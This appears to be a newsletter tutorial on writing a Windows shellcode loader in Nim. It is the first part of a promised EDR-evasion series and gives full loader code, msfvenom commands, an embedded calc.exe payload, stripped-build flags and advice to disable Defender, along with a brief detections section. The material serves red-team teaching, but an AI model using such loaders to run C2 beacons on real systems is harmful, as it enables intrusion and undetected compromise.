This will be the first of a series on building shellcode loaders with Nim. In this one we’ll talk about the basics of a shellcode loader and give you everything you need to get started. We’ll add evasion techniques, process injection, and tighten OPSEC over the next several issues.
Why Maldev?
If we really want to defend an environment we have to test its controls. The default settings are always insecure and often the EDR and AV solutions we use are in a near default state. Also maldev is fun. Learning the Windows API without the goal of getting past an EDR would be impossibly boring. I’ll show you the basics of it here. Nothing here on its own should get by EDR without work. Defender isn’t an EDR though and without a lot of work you can get past a lot by just obfuscating or encrypting your payload before executing it.
Why Nim?
What first brought me to Nim was the name. I thought it was cool and it reminded me of the Rats of NIMH, but there is no relation. It's extremely portable with mingw. I compile Windows binaries from Nim on every platform. The syntax reminds me of Python and it isn't overly verbose.
Shellcode Loaders
A shellcode loader is a tiny program whose only job is to execute shellcode. You’re gonna want one of these when you can execute code on a target. That could be from maldocs, trojans, or an exploit. The shellcode you use is typically a C2 beacon from Cobalt Strike, Sliver, and elsewhere. These C2s are heavily signatured so if you write them to disk or they get scanned in memory then you’re gonna fire alerts. The art of shellcode loaders is executing the shellcode in memory without alerting the EDR. We’re going to go over a simple one here in Nim.
import winim/lean
# Replace with your own payload. Generate one with:
# msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o sc.bin
# xxd -i sc.bin
# Placeholder below is a single `ret` so the program exits cleanly.
const shellcode: array[1, byte] = [0xC3.byte]
We have some basic Nim code that will take shellcode from Metasploit and execute it. The first important thing to note is the winim library. It’s the WinAPI library and is how we can use the Windows API so easily. /lean imports the Win32 API only without COM, macros, and other stuff.
The shellcode is a placeholder with a single ret. Metasploit can generate raw position-independent shellcode, so we can use it. However, you can’t just copy paste a PE binary into the code. The payload needs to be shellcode that can execute from wherever it lands in memory.
proc main() =
# 1. Allocate a region of memory we can write to
let mem = VirtualAlloc(
nil,
cast[SIZE_T](shellcode.len),
MEM_COMMIT or MEM_RESERVE,
PAGE_READWRITE
)
if mem == nil:
echo "alloc failed: ", GetLastError()
returnOur first step is to allocate some memory with the VirtualAlloc WinAPI call. VirtualAlloc is how we get Windows to give us a region of memory in our own process. It hands us a pointer to a mapped region we control.
The arguments:
nil- The address we want. Since we’re in the shellcode loader we don’t care. We let Windows pick.shellcode.len- how many bytes we need to hold our shellcode. Windows will round this up to a 4KB page on x64.MEM_COMMIT or MEM_RESERVE- Windows has two steps for memory allocation: reserving address space, and making it usable.PAGE_READWRITE- the protection we want on the page. We need to write the shellcode bytes into it. In the next step we’ll flip it to executable.
# 2. Copy shellcode into the writable region.
copyMem(mem, unsafeAddr shellcode[0], shellcode.len)copyMem is Nim's wrapper around memcpy. It takes a destination pointer, a source pointer, and a byte count, and copies one to the other. The destination is the memory we just got from VirtualAlloc.
# 3. Flip the page from RW to RX. Now executable, no longer writable.
var oldProtect: DWORD
if VirtualProtect(
mem,
cast[SIZE_T](shellcode.len),
PAGE_EXECUTE_READ,
addr oldProtect
) == 0:
echo "VirtualProtect failed: ", GetLastError()
returnVirtualProtect changes the protection on the memory we already own. We point it at the region we got from VirtualAlloc, tell it the new protection should be PAGE_EXECUTE_READ (RX, readable and executable, no longer writable), and pass it a DWORD to receive the old protection value. Windows requires we pass it a DWORD to receive the old protection value, even if we don't plan to use it.
# 4. Cast the memory address to a function pointer and call it.
let fn = cast[proc() {.cdecl.}](mem)
fn()
main()mem is the address that points to our shellcode. The cast allows us to call this as a function. This will execute the shellcode.
Ok, now it’s time to build it. Since this is Nim, we can compile this anywhere.
For Windows:
nim c -d:release loader.nimCross-compiling from Linux or macOS
We just need the mingw toolchain to cross-compile. We just pass -d:mingw and we can compile to Windows targets.
# Ubuntu / Debian
sudo apt install mingw-w64
# macOS
brew install mingw-w64
# Cross-compile to Windows x64
nim c -d:mingw -d:release --cpu:amd64 loader.nimYay it works. Now let’s do something useful. Let’s generate calc.exe shellcode with msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o sc.bin, then xxd -i sc.bin to get the C array form.
Putting it all together: shellcode loader with calc
import winim/lean
# msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o sc.bin
# xxd -i sc.bin
const shellcode: array[276, byte] = [
byte 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00,
0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52,
0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7,
0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41,
0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed,
0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b,
0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88,
0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67,
0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44,
0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56,
0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48,
0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1,
0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24,
0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44,
0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41,
0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49,
0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01,
0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a,
0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83,
0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41,
0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff,
0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d,
0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b,
0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2,
0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c,
0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47,
0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89,
0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e,
0x65, 0x78, 0x65, 0x00
]
proc main() =
# 1. Allocate RW only. No execute bit yet.
let mem = VirtualAlloc(
nil,
cast[SIZE_T](shellcode.len),
MEM_COMMIT or MEM_RESERVE,
PAGE_READWRITE
)
if mem == nil:
echo "alloc failed: ", GetLastError()
return
# 2. Copy shellcode into the writable region.
copyMem(mem, unsafeAddr shellcode[0], shellcode.len)
# 3. Flip the page to RX. Now executable, no longer writable.
var oldProtect: DWORD
if VirtualProtect(
mem,
cast[SIZE_T](shellcode.len),
PAGE_EXECUTE_READ,
addr oldProtect
) == 0:
echo "VirtualProtect failed: ", GetLastError()
return
# 4. Cast and call.
let fn = cast[proc() {.cdecl.}](mem)
fn()
main()So here we need to disable Defender because the shellcode as generated from msfvenom will get detected by Defender and it will eat our compiled binary.
And let’s change our compile options to make our executable smaller and strip out what we don’t need.
# Windows
nim c -d:danger -d:strip --opt:size --passC:-flto --passL:-flto loader.nim
# Linux & macOS
nim c -d:mingw -d:danger -d:strip --opt:size --passC:-flto --passL:-flto --cpu:amd64 loader.nim-d:mingw- Use mingw to compile to Windows.-d:danger- turn off all runtime safety checks (bounds, overflow, nil deref).-d:strip- strip debug info and symbol tables--opt:size- optimize for binary size instead of speed--passC:-flto- link-time optimization in the C compiler--passL:-flto- link-time optimization in the linker, lets it drop unused code across compilation units--cpu:amd64- produce x64 output. Default on a 64-bit Windows host so it's omitted there. Required when cross-compiling so Nim doesn't accidentally produce a 32-bit binary that won't run x64 shellcode
Once we’ve done that we can execute.

calc executes from loader.
Before we wrap up, run strings against the compiled binary:
gat0r@bast:/mnt/c/loader$ strings loader.exe | grep VirtualAlloc
VirtualAlloc
VirtualAllocVirtualAlloc shows up twice. PE binaries store imported function names in the import table by default. The OS loader needs them to resolve the actual addresses at process startup, so stripping doesn't touch them.
We can confirm with objdump:
gat0r@bast:/mnt/c/loader$ x86_64-w64-mingw32-objdump -p loader.exe | grep -A 20 "DLL Name: KERNEL32"
DLL Name: KERNEL32.dll
vma: Hint/Ord Member-Name Bound-To
2271c 20 AddVectoredExceptionHandler
2273a 141 CloseHandle
22748 197 CreateEventA
22758 243 CreateSemaphoreA
2276c 283 DeleteCriticalSection
22784 313 DuplicateHandle
22796 319 EnterCriticalSection
227ae 443 FreeLibrary
227bc 552 GetCurrentProcess
227d0 553 GetCurrentProcessId
227e6 556 GetCurrentThread
227fa 557 GetCurrentThreadId
22810 627 GetHandleInformation
22828 630 GetLastError
22838 651 GetModuleHandleA
2284c 710 GetProcAddress
2285e 711 GetProcessAffinityMask
22878 743 GetStartupInfoA
2288a 769 GetSystemTimeAsFileTimeobjdump ships with binutils on Linux. On Windows you can use dumpbin /imports loader.exe from a Visual Studio command prompt, or PE-Studio if you prefer a GUI.
Most of those imports aren't from our code. We never called AddVectoredExceptionHandler, CreateSemaphoreA, or EnterCriticalSection. Those come from the Nim runtime, the bits Nim links into every compiled binary to handle threading, exceptions, and memory management. Even our small loader drags this whole import set along with it. A Nim binary's import table is a pretty distinctive fingerprint, and detection engineers have noticed.
This is what an analyst sees in the first 30 seconds of examining your binary. PE-Studio, CFF Explorer, and most automated tools lead with the import table. These API names give away the behavior of the binary.
Hiding API names from static analysis is solvable. You can resolve them at runtime via LoadLibrary and GetProcAddress, or skip the names entirely with hash-based resolution. We'll get there in a future issue.
Detections & Mitigations
Defensive Tools & Detections:
YARA. Signatures targeting the embedded msfvenom shellcode stub will
fire on the bytes sitting in the binary regardless of how we load them.AV static scanning. Will flag known msfvenom payloads on disk before
the loader ever runs, since the bytes are in the binary in plaintext.
Alright we’ve written a short shellcode loader that demonstrates the concepts needed to move forward. It will get flagged by Defender for the msfvenom payload. Even if it didn’t the import table might give us away on static analysis. Next issue we’ll move out of our own process and run code in someone else’s with process injection. We’ll also encrypt/encode our payload so it isn’t immediately eaten. After that, suspended process targets, callback function abuse, Early Bird APC, and direct syscalls. Each issue will further close detection paths and by the end of the series we’ll have a loader and you’ll understand the OPSEC tradeoffs we make for each step.
If you found this useful, forward it to someone who’d actually read it.
Got questions, corrections, or want to argue about something? Just hit reply. I read everything.
— Jeff
